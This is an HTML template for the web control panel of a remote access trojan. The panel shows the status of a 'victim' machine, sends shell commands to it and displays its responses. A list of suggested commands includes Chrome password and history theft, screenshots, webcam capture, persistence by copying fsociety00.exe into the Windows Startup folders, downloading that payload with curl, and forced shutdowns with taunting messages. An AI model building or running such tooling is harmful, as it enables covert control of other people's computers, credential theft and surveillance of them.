{% extends "layout.html" %}
{% block content %}
<h1> Fuck S0ci3ty ! </h1>
<p> And s0 y0u ch00se this v1ct1m. </p> 
<div>
    <div class="dropdown" style="position: absolute; right:0; ">
      <button class="btn optionsBtn dropbtn" onclick="myFunction('{{ victim.id }}')">...</button>
      <div id="myDropdown{{ victim.id }}" class="dropdown-content" style="display: none;position: absolute;">
          <button class="btn optionsBtn" onclick="deleteHost('{{ victim.id }}')" style="width: 100%;">Delete</button>
          <button class="btn optionsBtn" style="width: 100%;" onclick="editHost('{{ victim.id }}')">Edit</button></div>
      </div>
    </div>
  <article class="media content-section">
		  <div class="media-body">
          <h2><a class="article-title" href="/ipwhois/{{ victim.name.split('|')[1] }}">{{ victim.name }}</a></h2>
          <div class="article-metadata">
            <small id="status" class="text-muted">Host is {% if status  %} <img src="/static/icons/online.png" style="width:10px;"> UP {% else %} <img src="/static/icons/offline.png" style="width:10px;"> DOWN {% endif %}</small>
          </div>
      </div>
		</article>
    
<div>
<form id="deleteHost" method="POST" action="" style="display: none">
    {{ form.hidden_tag() }} 
    {{ form.id.label(class="form-control-label ", style="display:none") }}
    {{ form.id(class="form-control form-control-lg ", style="display:none", id="deleteFormIdInput") }}
</form>



<div id="shell" class="content-section" style="padding:10px;">
</div>

<div class="container container-send-cmd">
  <input type="text" id="cmd" name="cmd" minlength="1" maxlength="1000" style="width:90%" class="form-control" placeholder="Server command" aria-label="Server command">
  <input type="submit" id="sendButton" class="btn btn-outline-danger" onclick="sendCommand()" style="width:10%" value="Send">
</div>

<div style="min-height:500px">
<h3> First essentials </h3>
<xmp style="line-height:15px">
> systeminfo
> net user
> net user {{ victim.name.split('|')[0] }}
> netprofiles 
> ipconfig
> tasklist /fi "username eq {{ victim.name.split('|')[0] }}" /fi "status eq running"

> ls c:\users
> ls c:\users\{{ victim.name.split('|')[0] }}\Desktop
> ls c:\users\{{ victim.name.split('|')[0] }}\Documents
> ls c:\users\{{ victim.name.split('|')[0] }}\Pictures
> ls c:\users\{{ victim.name.split('|')[0] }}\Videos
> ls c:\users\{{ victim.name.split('|')[0] }}\Downloads

> chromehistory
> chromepass
> firefoxhistory
> screenshot
> camera 1 ::take 1photo
> camera 5 ::take 5photoswith 2s delay in between
</xmp>
<h3> Some examples </h3>
<xmp style="line-height:15px">
> echo "Y0U H4VE B33N H4CK3D !!!" > H4CK3D.txt & notepad H4CK3D.txt
> for /l %i in (1,1,10) do calc

> curl https://i.pinimg.com/originals/f4/48/a4/f448a4e955f93fcad15ec166874cd21a.jpg
  --output fsociety.jpg & fsociety.jpg

> cp fsociety00.exe > "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
> cp fsociety00.exe > "C:\users\{{ victim.name.split('|')[0] }}\AppData\Roaming\Microsoft\windows\Start Menu\Programs\Startup\"

shutdown
> shutdown /s /f /t 60 /c "SHUTD0WN F0RCED BY HACKER" 

lock
> shutdown /l

reboot
> shutdown /r /f /t 60 /c "I TH1NK Y0UR C0MPUTER N33D A R3START ??" 

> PowerShell -Command "Add-Type –AssemblyName System.Speech; 
  (New-Object System.Speech.Synthesis.SpeechSynthesizer).Speak('Hello friend !');"
> curl {{ url_for('static', filename='payloads/fsociety00.exe') }} --output fsociety00.exe
</xmp>
</div>
 

{% endblock content %}

{% block myscript %}
<script>
    
    $('#cmd').keypress(function (e) {
      if (e.which == 13) {
        sendCommand();
      }
    });
    let answered = true; //boolean value saying either or not the last command was answered
    let online = false;
    if ("{{ status }}" == "True") 
        online = true;

    $(document).ready(()=> {
      setInterval(getStatus, 5000);
    })

    function sendCommand() {
      if (online) {
        $.ajax({
          data: {"command": $("#cmd").val(), "name": "{{ victim.name }}", "token": "{{ token }}"},
          type: "POST",
          url: "/ajax/send"
        }).done((data) => {
          console.log(data);
          answered = false;
          $("#cmd").prop("value", "");
          $("#shell").append(
            '<div class="container">' +
              '<span class="time-left">' + data.date + '</span>' +
              '<span class="who">Server : </span>' +
              '<xmp class="who">' + data.question + '</xmp>' +
            '</div>'
          );
          $("#cmd")[0].scrollIntoView(true);
        })
      } else {
        alert('[Error] Shame ! Host is offline...');
      } 
    }

    function getResponse(){
      $.ajax({
        data: {"name": "{{ victim.name }}"},
        type: "POST",
        url: "/ajax/response"
      }).done((data) => {
        console.log(data);
        if (data.response != "" && !answered && data.response != null) {
          answered = true;
          $("#shell").append( 
            '<div class="container">' +
              '<span class="time-left">' + data.date + '</span>' +
              '<span class="who">{{ victim.name }} : </span>' +
              '<xmp class="who">' + data.response + '</xmp>' +
            '</div>'
          );
         $("#cmd")[0].scrollIntoView(true);
        }
      })
    }
    getResponse();

    function getStatus() {
      $.ajax({
        data : {name: "{{ victim.name }}"},
        type: "POST",
        url: "/ajax/getstatus"
      }).done((data) => {
        //console.log(data);
        if (parseInt(data) === 1){
            online = true;
            //console.log("Host is up");
            $("#status").html('Host is <img src="/static/icons/online.png" style="width:10px;"> UP');
            // host is online -> look if he already answered
            if (!answered) {
              // if not answered yet -> getresponse 
              getResponse();
            }

        } else {
            online = false;
            console.log("Host is down");
            $("#status").html('Host is <img src="/static/icons/offline.png" style="width:10px;"> DOWN');
        }
      })
    }


    function myFunction(id) {
        console.log("options");
        if (document.getElementById("myDropdown" + id).style.display == "none") {
            document.getElementById("myDropdown" + id).style.display = "block";
        } else {
            document.getElementById("myDropdown" + id).style.display = "none";
        }
    }


    function deleteHost(id) {
        document.getElementById('deleteFormIdInput').value = id;
        document.getElementById('deleteHost').submit();
    }


    function editHost(id) {
        window.location.href = "/adminpanel/edit/" + id;
    }
</script>
{% endblock myscript %}